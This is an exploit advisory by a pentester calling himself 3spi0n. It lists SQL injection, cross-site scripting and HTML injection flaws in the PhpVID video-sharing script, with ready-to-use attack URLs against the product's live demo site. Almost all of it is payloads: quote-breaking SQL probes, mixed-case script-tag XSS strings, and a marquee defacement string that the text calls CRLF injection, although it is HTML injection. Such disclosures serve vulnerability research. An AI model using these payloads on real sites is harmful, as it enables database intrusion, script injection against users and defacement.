PHP VID suffers from cross site scripting, remote SQL injection, and CRLF injection vulnerabilities.
6c7f7345977e15097b906b10ba4a8141dc3482c98eca4df98a497d15d7ec4dd8
##################################################################################
_____ _ _ _ _____
| __ \ | | | | (_) / ____|
| |__) |_____ _____ | |_ _| |_ _ ___ _ __ | (___ ___ ___
| _ // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \ \___ \ / _ \/ __|
| | \ \ __/\ V / (_) | | |_| | |_| | (_) | | | | ____) | __/ (__
|_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___|
##################################################################################
PhpVID Script, Multiple Vulnerabilities
Product Page: http://www.vastal.com/phpvid-the-video-sharing-software.html
Script Demo: http://www.phpvid.com
Author(Pentester): 3spi0n
On Web: RevolutionSec.Com - GraySecure.Org
On Social: Twitter.Com/eyyamgudeer
##################################################################################
[1] SQL Injection Vulnerabilities on Demo Site
[+] (browse_videos.php, n Param)
>>> http://www.phpvid.com//browse_videos.php?cat=&n='1
[+] (groups.php, cat Param)
>>> http://www.phpvid.com/groups.php?cat='1
[+] (members.php, n Param)
>>> http://www.phpvid.com/members.php?browse=recent&n='1
[2] XSS Vulnerability on Demo Site
[+] (browse_videos.php, n Param)
>>> http://phpvid.com/browse_videos.php?cat=&n=1'<ScRiPt >prompt(959580)</ScRiPt>
[+] (groups.php, cat Param)
>>> http://phpvid.com//groups.php?cat=1'<ScRiPt >prompt(987925)</ScRiPt>
[+] (search_results.php.php, query Param)
>>> http://phpvid.com//search_results.php?query=<ScRiPt >prompt(931776)</ScRiPt>
[3] CRLF Injection Vulnerability on Demo Site
>>> http://phpvid.com/search_results.php?query=<marquee><h1>come to dance! <br>by, 3spi0n</h1></marquee>